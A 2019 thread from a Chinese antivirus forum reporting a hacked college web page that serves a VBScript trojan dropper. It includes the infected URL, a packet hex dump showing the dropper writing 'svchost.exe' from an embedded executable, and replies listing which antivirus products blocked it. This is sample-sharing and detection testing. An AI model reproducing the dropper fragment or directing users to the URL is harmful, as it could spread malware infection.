查看: 3076|回复: 11
收起左侧

[未鉴定] 广东青年职业学院被挂马

[复制链接]
BE_HC
发表于 2019-8-2 18:58:01 | 显示全部楼层 |阅读模式
挂马地址

  1. dgsx.gdyvc.cn/suite/portal/displayItem/3738/123.html
复制代码


IPS 封包

  1. 0000   45 00 05 D4 4E 9B 40 00 34 06 F6 63 B7 18 3A EE    E...N.@.4..c..:.
  2. 0010   0A 1D 00 02 00 50 CE A5 FD 3D 3E A1 43 1C E7 55    .....P...=>.C..U
  3. 0020   80 10 01 6A 51 BF 00 00 01 01 08 0A 45 95 B1 47    ...jQ.......E..G
  4. 0030   00 58 37 0F 65 66 3D 22 6A 61 76 61 73 63 72 69    .X7.ef="javascri
  5. 0040   70 74 3A 63 68 61 6E 67 65 69 6D 67 28 27 2B 69    pt:changeimg('+i
  6. 0050   2B 27 29 3B 22 20 69 64 3D 22 78 78 6A 64 6A 6A    +');" id="xxjdjj
  7. 0060   27 2B 69 2B 27 22 20 63 6C 61 73 73 3D 22 61 78    '+i+'" class="ax
  8. 0070   78 22 20 74 61 72 67 65 74 3D 22 5F 73 65 6C 66    x" target="_self
  9. 0080   22 3E 27 2B 69 2B 27 3C 2F 61 3E 27 29 3B 7D 0D    ">'+i+'</a>');}.
  10. 0090   0A 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28    .document.write(
  11. 00A0   27 3C 2F 64 69 76 3E 3C 2F 64 69 76 3E 3C 2F 64    '</div></div></d
  12. 00B0   69 76 3E 27 29 3B 0D 0A 64 6F 63 75 6D 65 6E 74    iv>');..document
  13. 00C0   2E 77 72 69 74 65 28 27 3C 64 69 76 20 61 6C 69    .write('<div ali
  14. 00D0   67 6E 3D 63 65 6E 74 65 72 3E 3C 69 6E 70 75 74    gn=center><input
  15. 00E0   20 69 64 3D 22 74 69 74 6C 65 22 20 74 79 70 65     id="title" type
  16. 00F0   3D 22 74 78 74 22 20 73 74 79 6C 65 3D 22 68 65    ="txt" style="he
  17. 0100   69 67 68 74 3A 32 30 70 78 3B 62 61 63 6B 67 72    ight:20px;backgr
  18. 0110   6F 75 6E 64 2D 63 6F 6C 6F 72 3A 23 66 32 66 36    ound-color:#f2f6
  19. 0120   66 62 3B 62 6F 72 64 65 72 3A 30 70 78 20 73 6F    fb;border:0px so
  20. 0130   6C 69 64 20 23 66 32 66 36 66 62 3B 77 69 64 74    lid #f2f6fb;widt
  21. 0140   68 3A 27 2B 77 69 64 74 68 73 73 2B 27 70 78 3B    h:'+widthss+'px;
  22. 0150   63 6F 6C 6F 72 3A 23 33 33 33 33 33 33 3B 66 6F    color:#333333;fo
  23. 0160   6E 74 2D 73 69 7A 65 3A 39 70 74 3B 70 6F 73 69    nt-size:9pt;posi
  24. 0170   74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 70 61    tion:relative;pa
  25. 0180   64 64 69 6E 67 2D 74 6F 70 3A 31 3B 74 65 78 74    dding-top:1;text
  26. 0190   2D 61 6C 69 67 6E 3A 63 65 6E 74 65 72 3B 22 3E    -align:center;">
  27. 01A0   3C 2F 64 69 76 3E 27 29 3B 0D 0A 2F 2F 64 6F 63    </div>');..//doc
  28. 01B0   75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 2F 64    ument.write('</d
  29. 01C0   69 76 3E 27 29 3B 0D 0A 2F 2F BF AA CA BC D6 B4    iv>');..//......
  30. 01D0   D0 D0 B9 F6 B6 AF B2 D9 D7 F7 0D 0A 63 68 61 6E    ............chan
  31. 01E0   67 65 5F 69 6D 67 28 29 3B 0D 0A 2F 2F 2D 2D 3E    ge_img();..//-->
  32. 01F0   0D 0A 3C 2F 53 43 52 49 50 54 3E 0D 0A 20 20 20    ..</SCRIPT>..   
  33. 0200   20 20 20 20 20 20 20 20 20 20 20 3C 2F 44 49 56               </DIV
  34. 0210   3E 3C 2F 54 44 3E 0D 0A 20 20 20 20 20 20 20 20    ></TD>..        
  35. 0220   20 20 3C 2F 54 52 3E 0D 0A 20 20 20 20 20 20 20      </TR>..      
  36. 0230   20 3C 2F 54 42 4F 44 59 3E 0D 0A 20 20 20 20 20     </TBODY>..     
  37. 0240   20 3C 2F 54 41 42 4C 45 3E 3C 53 43 52 49 50 54     </TABLE><SCRIPT
  38. 0250   20 4C 61 6E 67 75 61 67 65 3D 56 42 53 63 72 69     Language=VBScri
  39. 0260   70 74 3E 3C 21 2D 2D 0D 0A 44 72 6F 70 46 69 6C    pt><!--..DropFil
  40. 0270   65 4E 61 6D 65 20 3D 20 22 73 76 63 68 6F 73 74    eName = "svchost
  41. 0280   2E 65 78 65 22 0D 0A 57 72 69 74 65 44 61 74 61    .exe"..WriteData
  42. 0290   20 3D 20 22 34 44 35 41 39 30 30 30 30 33 30 30     = "4D5A90000300
  43. 02A0   30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46    000004000000FFFF
  44. 02B0   30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30    0000B80000000000
  45. 02C0   30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30    0000400000000000
  46. 02D0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  47. 02E0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  48. 02F0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  49. 0300   30 30 30 30 30 30 30 30 30 30 30 30 38 38 30 30    0000000000008800
  50. 0310   30 30 30 30 30 39 44 41 46 35 43 35 43 38 32 34    000009DAF5C5C824
  51. 0320   45 41 32 35 46 30 30 35 35 43 37 45 42 35 35 36    EA25F0055C7EB556
  52. 0330   31 30 46 41 34 41 39 33 32 37 38 34 30 41 45 42    10FA4A9327840AEB
  53. 0340   43 30 31 42 44 43 32 32 38 34 43 42 30 43 34 46    C01BDC2284CB0C4F
  54. 0350   30 35 42 31 30 45 45 42 46 45 30 34 41 32 42 46    05B10EEBFE04A2BF
  55. 0360   37 42 32 42 35 42 39 36 33 38 37 33 36 37 32 33    7B2B5B9638736723
  56. 0370   39 33 42 45 32 38 39 41 37 44 36 41 31 35 42 39    93BE289A7D6A15B9
  57. 0380   43 31 31 37 44 30 46 34 42 43 31 30 32 46 34 45    C117D0F4BC102F4E
  58. 0390   45 36 30 43 30 30 30 30 30 30 30 30 30 30 30 30    E60C000000000000
  59. 03A0   30 30 30 30 35 30 34 35 30 30 30 30 34 43 30 31    0000504500004C01
  60. 03B0   30 33 30 30 38 41 44 42 32 44 42 33 30 30 30 30    03008ADB2DB30000
  61. 03C0   30 30 30 30 30 30 30 30 30 30 30 30 45 30 30 30    000000000000E000
  62. 03D0   30 46 30 31 30 42 30 31 30 37 30 34 30 30 33 30    0F010B0107040030
  63. 03E0   30 31 30 30 30 30 38 30 30 30 30 30 30 30 41 30    01000080000000A0
  64. 03F0   30 33 30 30 34 30 44 32 30 34 30 30 30 30 42 30    030040D2040000B0
  65. 0400   30 33 30 30 30 30 45 30 30 34 30 30 30 30 30 30    030000E004000000
  66. 0410   34 30 30 30 30 30 31 30 30 30 30 30 30 30 30 32    4000001000000002
  67. 0420   30 30 30 30 30 35 30 30 30 30 30 30 30 37 30 30    0000050000000700
  68. 0430   30 32 30 30 30 34 30 30 30 30 30 30 30 30 30 30    0200040000000000
  69. 0440   30 30 30 30 30 30 42 30 30 35 30 30 30 30 31 30    000000B005000010
  70. 0450   30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30    0000000000000200
  71. 0460   30 30 30 30 30 30 30 30 31 30 30 30 30 30 31 30    0000000010000010
  72. 0470   30 30 30 30 30 30 30 30 31 30 30 30 30 30 31 30    0000000010000010
  73. 0480   30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30    0000000000001000
  74. 0490   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  75. 04A0   30 30 30 30 37 34 35 38 30 35 30 30 45 34 30 30    000074580500E400
  76. 04B0   30 30 30 30 30 30 45 30 30 34 30 30 30 30 44 30    000000E0040000D0
  77. 04C0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  78. 04D0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  79. 04E0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  80. 04F0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  81. 0500   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  82. 0510   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  83. 0520   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  84. 0530   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  85. 0540   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  86. 0550   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  87. 0560   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  88. 0570   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  89. 0580   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  90. 0590   30 30 30 30 35 35 35 30 35 38 33 30 30 30 30 30    0000555058300000
  91. 05A0   30 30 30 30 30 30 41 30 30 33 30 30 30 30 31 30    000000A003000010
  92. 05B0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32    0000000000000002
  93. 05C0   30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30    0000000000000000
  94. 05D0   30 30 30 30                                        0000
复制代码


Norton IPS Block

QQ截图20190802185741.png

Sailer.X 该用户已被删除
发表于 2019-8-2 21:23:39 | 显示全部楼层
第一次见Trend Micro的浏览器漏洞防护起作用:

  1. Website Address: http://dgsx.gdyvc.cn/suite/portal/displayItem/3738/123.html
  2. Rating:        Dangerous Page
  3. Response:        Blocked
  4. Detected By:        Browser Exploitation Prevention
复制代码

N卡网速快
发表于 2019-8-3 00:45:37 | 显示全部楼层
SharedScreenshot_waifu2x_art_noise1_tta_1 (1).png SharedScreenshot2_waifu2x_art_noise1_tta_2.png
温馨小屋
头像被屏蔽
发表于 2019-8-3 00:48:06 | 显示全部楼层
捕获.PNG
温馨小屋
头像被屏蔽
发表于 2019-8-3 00:51:08 | 显示全部楼层
这俩货都是入库杀。。。

捕获.PNG
记录微笑
发表于 2019-8-3 14:55:51 | 显示全部楼层
Mcafee ENS miss
打开以后也没发现异常,可能是被脚本扫描阻止了,日志里没写。
RUAOT
发表于 2019-8-4 09:16:14 | 显示全部楼层
还不赖
批注 2019-08-04 091549.png
syr000
发表于 2019-8-5 21:35:17 | 显示全部楼层
卡巴斯基
拒绝访问
无法访问该网页

对象网址:

http://dgsx.gdyvc.cn/suite/portal/displayItem/3738/123.html
原因: 对象被感染 Trojan-Dropper.VBS.Agent.bp

消息生成时间: 2019/8/5 21:34:00
记录微笑
发表于 2019-8-5 22:04:53 | 显示全部楼层
咖啡终于拉黑了


该站点已被阻止。
http://dgsx.gdyvc.cn/suite/portal/displayItem/3738/123.html
此网站上存在无法接受的安全风险。
McAfee 网页类别: 恶意站点
McAfee 安全评级: 不安全

Powered By: McAfee Endpoint Security
McAfee Logo
ae1202
发表于 2019-8-6 13:23:55 | 显示全部楼层
Web Protection by
Bitdefender
Dangerous page blocked for your protection
http://dgsx.gdyvc.cn/suite/portal/displayItem/3738/123.html
Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.

TAKE ME BACK TO SAFETY
I understand the risks, take me there anyway
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 20:56 , Processed in 0.142098 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表